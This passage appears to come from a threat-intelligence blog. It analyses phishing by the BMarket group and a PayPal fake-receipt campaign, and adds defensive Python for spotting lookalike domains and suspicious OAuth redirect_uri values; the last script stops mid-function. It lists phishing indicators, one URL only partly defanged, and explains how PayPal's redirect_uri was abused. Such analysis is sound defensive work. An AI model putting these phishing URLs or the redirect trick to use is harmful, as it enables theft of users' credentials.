We were only able to look at the incoming credentials shared in the group chats, which amounted to hundreds of victims by our count. Adding the credentials that were not shared would probably put the true number of their victims much higher. </span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><u>Conclusions</u></b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Traditional phishing hunting operations tend to rely on certificate and brand-name watching. This tactic is usually quite successful, since phishing domains rarely have a lifespan longer than a day or two, and if a phishing page does slip past the hunters it is at least usually reported as fake by wary users. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">The threat that closed scamming communities such as BMarket pose lies in crowdsourcing their setbacks and problems. While a lone scammer might quit after an unsuccessful attack, a strong base of experienced users, and in this case a tool creator looking to satisfy his clients, will immediately fix whatever is broken or detected by phishing-domain watchers. It also offers their operations some confidentiality:</span><span style="font-family: "arial" , "helvetica" , sans-serif;"> a small group such as this is harder to track when it makes little noise beyond its chat platforms. While some of their phishing domains are quickly identified, when looking at their operations we saw that a lot of Apple and PayPal customers still fell victim to their ploy. We think this is also due to the group's heavy use of shortened and redirected links.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">In the grander scheme of the cybercrime landscape, it seems that passive hunting alone cannot replace actively tracking and infiltrating cybercrime groups if phishing activity such as this is to be successfully mitigated. </span><br />
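As an added example, not tooling from this post or from the groups it describes, the brand-name watching mentioned above applied to hostnames written in the defanged style of this post's IOC lists: the script refangs hxxp:// and [.], splits off the registrable domain with a deliberately simplified suffix heuristic (an assumption standing in for the Public Suffix List), and flags brand names placed in subdomains, padded inside the registrable label, or one edit away from a brand. The sample indicators are taken from this post.

```python
"""Brand-impersonation checker for defanged phishing hostnames.

Added example, not tooling from the post. It applies the brand-name
watching the conclusion describes to hostnames written in the defanged
style of this post's IOC lists (hxxp://, [.] for dots, trailing paths).
Heuristic only: the registrable domain is assumed to be the last two
labels, or the last three for a short hard-coded set of second-level
suffixes; a production tool would use the Public Suffix List instead.
"""
import re

BRANDS = ("apple", "paypal", "amazon", "itunes")
# Assumption: a minimal stand-in for the Public Suffix List.
SECOND_LEVEL_SUFFIXES = {"ac.id", "or.id", "co.id", "co.uk", "com.au"}
DEFANG_DOT = re.compile(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]", re.IGNORECASE)
DEFANG_SCHEME = re.compile(r"^hxxps?://|^https?://", re.IGNORECASE)


def refang(indicator):
    """Return the bare lowercase hostname from a defanged indicator."""
    s = DEFANG_SCHEME.sub("", indicator.strip())
    s = DEFANG_DOT.sub(".", s)
    s = re.split(r"[/?]", s, maxsplit=1)[0]  # drop path and query string
    return s.lower().strip(".")


def split_registrable(host):
    """Return (subdomain, registrable_domain) using the suffix heuristic."""
    labels = host.split(".")
    n = 3 if len(labels) >= 3 and ".".join(labels[-2:]) in SECOND_LEVEL_SUFFIXES else 2
    if len(labels) <= n:
        return "", host
    return ".".join(labels[:-n]), ".".join(labels[-n:])


def levenshtein(a, b):
    """Edit distance, used to spot one-character brand lookalikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def brand_findings(indicator):
    """List the reasons a defanged hostname looks like brand impersonation.

    Each finding is a short tag:
      subdomain-brand:<brand>   brand name sits in the subdomain labels
      embedded-brand:<brand>    brand name padded inside the registrable label
      lookalike:<token>~<brand> a token one edit away from a brand (e.g. pavypal)
    An empty list means the heuristics saw nothing brand-related.
    """
    host = refang(indicator)
    sub, reg = split_registrable(host)
    reg_label = reg.split(".")[0]
    findings = []
    for brand in BRANDS:
        if brand in sub:
            findings.append(f"subdomain-brand:{brand}")
        elif brand in reg_label and reg_label != brand:
            findings.append(f"embedded-brand:{brand}")
    # Tokens are label pieces split on dots and hyphens; short ones are skipped
    # because one edit on a four-letter word matches too much by chance.
    tokens = {t for t in re.split(r"[.-]", host) if len(t) >= 5}
    for token in sorted(tokens):
        for brand in BRANDS:
            if token != brand and levenshtein(token, brand) == 1:
                findings.append(f"lookalike:{token}~{brand}")
    return sorted(findings)


def triage(indicators):
    """Map each indicator to its findings; meant to run over a whole IOC list."""
    return {ind: brand_findings(ind) for ind in indicators}


if __name__ == "__main__":
    # Indicators copied from this post's IOC lists.
    SAMPLES = [
        "appleid.apple.com.login.contact-support[.]email",
        "home-pavypal.com-acknowledge[.]info",
        "hxxp://bmarket[.]or[.]id/sendinbox-server[.]php",
        "app-idnscj-34[.]com/?16shop",
    ]
    for ind, found in triage(SAMPLES).items():
        print(f"{ind:55} {found or 'no brand signal'}")
```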
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><u>IOCs</u></b></span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Twitter handles connected to this group:</b></span><br />
<br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Phishing Domains:</span></b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Used Mailing Infrastructure:</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Compromised Websites Shared By the Group:</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">*Currently unconfirmed if being used by the group.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>Andrei Kornev<br />
<br />
<b>Uncovering A PayPal Phishing Campaign</b> (2018-07-20, updated 2018-07-28)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">While browsing the DC9723 group, we stumbled on a screenshot which one of the group's members had just shared with the rest of the DefCon group. </span></span><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">The group member had received what he claimed was a PayPal phishing email. He claimed he had received it on the previous day (July 14th) and that it contained a fake receipt for a purchase he had never made from an alleged Italian internet hosting company. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">When we looked into this "Aruba IT" company, we saw that it actually was a legitimate internet hosting and domain registration company based in Italy. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">This raised our curiosity to look further into the email itself and see whether anything else could be recovered that points to clues about this campaign, who else might be used as a front, and whether we could identify any malicious activity.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img alt="37219197_10156461903061894_5675719665855234048_o" height="548" src="https://lh4.googleusercontent.com/yNJCPdXhOsAAw_W-hCXiffsDTra4_65Ctzy8ce_IlPnTsWWVbvVeU37fGkihKojjY82PiJvNChcFVN4bgxM8UlFiiIHS15HNzFqJ_M7Eqc9pOD09ZVJPv-JpyuMjj6i9lALM_gXV" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="640" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">The screenshot shared by the DC9723 user.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;">Fake Receipt Phishing</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">By using a fake receipt like this, an attacker aims to alarm the recipient that a substantial purchase has just been made in their name, hoping such a message will motivate the recipient into taking action where a more traditional phishing email might not. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">The attacker in this case copied the main PayPal template for electronic receipts; by doing so the attacker hopes to scare the recipient into logging into the PayPal site and giving away their credentials. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Conveniently, as seen in the above screenshot, a line which isn't present in a real PayPal receipt has been added -</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> " </span><span style="background-color: transparent; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You don't recognize this transaction</span><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">? " </span></span><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">with an embedded link that can be seen at the bottom of the email.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">In all probability, this was added to further guide the potential target along the path of action the attacker wants him to take, and it serves as a correlated pretext for resolving this supposed receipt misunderstanding. </span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">On closer inspection, we can also see that this email contains some spelling mistakes and mistyped numbers. Perhaps these are intentional, adding a state of confusion to the already dire financial situation the target may feel he is in, and an even further sense of urgency to resolve the whole issue. </span></span><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">Or, more likely, this just means the email was recompiled in haste. </span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">The reply emails: </span><b style="font-family: arial, helvetica, sans-serif; white-space: pre-wrap;">receipt@intl.paypai.com</b><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">, </span><b style="font-family: arial, helvetica, sans-serif; white-space: pre-wrap;">noreply@intl.pavpal.com</b><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"> stand out as obvious spoofs. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;"><u>pavpal[.]com</u></span><span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;"> had been seen in old phishing activity in the past and has since been registered by the actual PayPal company, probably in an effort to block this type of activity. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;"><u>paypai[.]com</u></span><span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;"> has also been observed in numerous scam attempts and phishing campaigns, with the domain belonging to Moniker Online Services.</span><br />
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://myonlinesecurity.co.uk/fake-paypal-your-account-has-been-limited-leads-to-a-money-making-scam/">https://myonlinesecurity.co.uk/fake-paypal-your-account-has-been-limited-leads-to-a-money-making-scam/</a></span></li>
</ul>
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://www.paypal-community.com/t5/PayPal-Basics/Spoof-Phishing-Emails-Tips-on-how-to-identify-amp-stay-protected/td-p/628490/page/5">https://www.paypal-community.com/t5/PayPal-Basics/Spoof-Phishing-Emails-Tips-on-how-to-identify-amp-stay-protected/td-p/628490/page/5</a></span></li>
</ul>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Both are widely reported websites. This makes it very hard to conclude whether this attacker actually has current control of these mailboxes.</span><br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">The embedded link to the fake PayPal resolution center this attacker chose to use was based on Twitter's link shortener:</span></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">t[.]co/Tv5Zo3ig7v</span></li>
</ul>
</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Taking a peek at the link and looking at its redirect chain:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img alt="redirect" height="185" src="https://lh6.googleusercontent.com/beqMf4iYfQyi3XG-C44mNkVyFOQGDFFyOXwclElxzgNESx8PgS99tn8snYUDzw1l3o6gOoJed2bmliXxVGXg9oP7b2ucRC1qKVAPH9ThxY3_OJk-LSiP_Xz5kkj5p2k8AzphJJHR" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Source: urlscan.io</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">We can identify that the actual target domain was paypa[.]com-verifyseeds[.]support</span></span><br />
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="457" src="https://lh4.googleusercontent.com/lNpCi-7KAk1FHILN-1rMyUNaX0k_tCgLXNAmSd-_-4lXaz3D6iztodke1aKs58087pBsXeFYks0_EYU4tCgDmH4ax2aJXRe-ti00YiUJ5sjLZpFVjf_CF4AKtaufX1Zz7R4ehKcU" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Source: urlscan.io</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">By searching for similar pages based on the resource path we could identify similar domains being used in the past two weeks:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Along with the following redirects:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">These different redirects made us suspect that a phishing kit was being used here and spread during these couple of weeks. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">The domain which is currently still live and being used through the redirection chain is:</span></span></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">t<span style="white-space: normal;">[.]</span>co-d3gbfd<span style="white-space: normal;">[.]</span>city/147/</span></span></blockquote>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">It can be seen redirecting us to paypal.com-signinaccountsafe.info/stylec0de</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><u>www.paypa</u><span style="white-space: normal;">[.]</span><u>com-verifyseeds</u><span style="white-space: normal;">[.]</span><u>support </u>- the redirection domain from our screenshot</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">And</span><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"><u>www.paypa</u><span style="white-space: normal;">[.]</span><u>com.lakukerascok</u><span style="white-space: normal;">[.]</span><u>com</u></span></span></div>
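<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">As an added example (not code from the original post), the following Python triages the two patterns this campaign relies on: typosquatted sender domains such as paypai and pavpal, and brand-in-subdomain hosts such as paypa[.]com-verifyseeds[.]support reached through a shortener redirect chain. The BRANDS table, the two-label suffix table and the hop order in SAMPLE_REDIRECTS are constructed assumptions; a real deployment would consult the Public Suffix List and follow live HTTP responses instead of the offline map.</span></div>

```python
"""Triage helpers for lookalike domains and a redirect chain (added example).

Not code from the original post. BRANDS, TWO_LABEL_SUFFIXES and
SAMPLE_REDIRECTS are constructed for the demonstration.
"""
from typing import Dict, List
from urllib.parse import urlsplit

# Protected brand names and their genuine registrable domains (constructed).
BRANDS = {"paypal": "paypal.com", "apple": "apple.com"}

# Two-label public suffixes seen among the post's indicators. A real deployment
# would consult the Public Suffix List instead of this short constructed table.
TWO_LABEL_SUFFIXES = {"co.uk", "com.br", "com.au", "co.id", "or.id", "com.ve"}

# Constructed redirect map shaped like the chain urlscan.io showed: shortener,
# then the still-live hop, then the landing page. The hop order is an assumption.
SAMPLE_REDIRECTS = {
    "t.co/Tv5Zo3ig7v": "t.co-d3gbfd.city/147/",
    "t.co-d3gbfd.city/147/": "www.paypa.com-verifyseeds.support",
}


def refang(ioc: str) -> str:
    """Turn a defanged indicator (example[.]com) back into a parsable one."""
    return ioc.strip().replace("[.]", ".")


def host_of(ioc: str) -> str:
    """Lower-cased host of a URL or bare host indicator, defanged or not."""
    s = refang(ioc).lower()
    if "://" not in s:
        s = "http://" + s
    return urlsplit(s).hostname or ""


def registrable_domain(host: str) -> str:
    """Approximate the owner-controlled (registrable) part of a hostname."""
    labels = host.split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; catches one-character typosquats like paypai."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reasons(host: str) -> List[str]:
    """Explain why a host resembles a protected brand; empty means it does not."""
    reg = registrable_domain(host)
    if reg in BRANDS.values():
        return []  # the genuine domain and its subdomains are never lookalikes
    reg_label = reg.split(".")[0]
    # Everything left of the registrable domain is chosen freely by its owner,
    # e.g. "paypal" in paypal.com-webapps.site or "www.paypa" in
    # www.paypa.com.lakukerascok.com; hyphens are split like dots.
    leading = host[: len(host) - len(reg)].rstrip(".")
    free_labels = [lab for lab in leading.replace("-", ".").split(".") if lab]
    reasons = []
    for brand in BRANDS:
        if edit_distance(reg_label, brand) <= 1:
            reasons.append(f"typosquat of {brand}: {reg}")
        for label in free_labels:
            if edit_distance(label, brand) <= 1:
                reasons.append(f"label '{label}' resembles {brand} on {reg}")
                break
    return reasons


def walk_chain(start: str, redirects: Dict[str, str], max_hops: int = 10) -> List[str]:
    """Follow an offline redirect map, stopping at loops or after max_hops."""
    chain = [refang(start)]
    while chain[-1] in redirects and len(chain) <= max_hops:
        nxt = redirects[chain[-1]]
        if nxt in chain:
            break  # redirect loop
        chain.append(nxt)
    return chain


def triage(start: str, redirects: Dict[str, str]) -> dict:
    """Resolve a shortened link through the map and judge where it lands."""
    chain = walk_chain(start, redirects)
    landing = host_of(chain[-1])
    return {"chain": chain, "hops": len(chain) - 1,
            "landing_host": landing, "reasons": lookalike_reasons(landing)}


if __name__ == "__main__":
    for sender_domain in ("intl.paypai.com", "intl.pavpal.com", "www.paypal.com"):
        print(sender_domain, "->", lookalike_reasons(sender_domain) or "looks genuine")
    print(triage("t[.]co/Tv5Zo3ig7v", SAMPLE_REDIRECTS))
```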
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Since the email was immediately reported to PayPal, we could witness how effective redirection chains are at prolonging the life of phishing scams. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Both of these websites are hosted on the same Google server - 142.4.14<span style="white-space: normal;">[.]</span>169</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Along with a now empty Apache server:</span></span><br />
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"><img height="149" src="https://lh6.googleusercontent.com/ZMMVw9nRl8-UdAdzr1GqfTEdbeQb4ej7MjomcIEuYhF8h1CdYd_S4QCRRydJcrmJ4ONgjG6kCBZ4vTcQQSwhx5tJcVwTiVwKYnOndO9KCDTEbd_mjp8qubK2nqRX1zltyb6Y51E6" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">All of them point to the same ‘/stylec0de’ path, as in the following full URI example:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">https://www.paypal<span style="white-space: normal;">[.]</span>com/webapps/auth/protocol/openidconnect/v1/authorize?client_id=ATv4mHm-hSwKR8NFeKUJTagPctQ5ln4AExlRx3WY_ept7RIZVrA9FEr02IAnBjUd-cPTgck3TDqJbdG-&response_type=code&scope=openid%20profile%20email%20address%20phone&redirect_uri=https://www.paypal.com-signinaccountsafe.info/stylec0de</span></span></blockquote>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">The redirection path piggybacks on PayPal’s own authentication API backbone: the link genuinely starts at www.paypal.com, and only the redirect_uri parameter at its end hands the victim to the attacker’s domain, so the message passes as seemingly legitimate PayPal correspondence. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">A victim looking to quickly resolve a financial issue might not read through the very long link and would miss the spoofed URL at the end of it, handing his credentials to the attacker. Using a malicious iframe like this, a sophisticated campaign can be built on nothing more than a victim’s innocence.</span></span></div>
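<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The check a mail gateway or analyst would want for a link like the one above, as an added example that is not code from this post: parse the authorize URL, pull out every redirect_uri, and flag any whose hostname is not paypal.com or a true subdomain of it (the hyphen and dot tricks in the domains above both fail that test). The trusted-domain list, the brand tokens and the sample links are assumptions; the client_id is a placeholder.</span></div>

```python
"""Added example (not code from the original post): flag OAuth/OpenID Connect
links whose redirect_uri leaves the brand's real domain, the trick used by the
PayPal phishing link above. Hostnames below are constructed or taken from the
post; the client_id is a placeholder."""
from urllib.parse import parse_qs, urlparse

# Assumption: domains (and their subdomains) that may legitimately receive the redirect.
TRUSTED_DOMAINS = ("paypal.com",)
# Assumption: brand fragments that, inside an untrusted hostname, mark a lookalike.
BRAND_TOKENS = ("paypal", "paypa")


def hostname_of(url: str) -> str:
    """Lower-cased hostname of url, or '' if it cannot be parsed.
    urlparse() already strips userinfo, so 'https://paypal.com@evil.test/'
    yields 'evil.test'."""
    try:
        host = urlparse(url).hostname
    except ValueError:
        return ""
    return (host or "").lower().rstrip(".")


def is_trusted_host(host: str) -> bool:
    """True only for a trusted domain or a real subdomain of one.
    'www.paypal.com-signinaccountsafe.info' and 'www.paypa.com.lakukerascok.com'
    both fail: the dotted suffix must be exactly '.paypal.com'."""
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)


def is_brand_lookalike(host: str) -> bool:
    """An untrusted host that still carries the brand name inside it."""
    return not is_trusted_host(host) and any(t in host for t in BRAND_TOKENS)


def redirect_uris(url: str) -> list:
    """Every redirect_uri value in the query string, percent-decoded."""
    return parse_qs(urlparse(url).query).get("redirect_uri", [])


def assess_link(url: str) -> dict:
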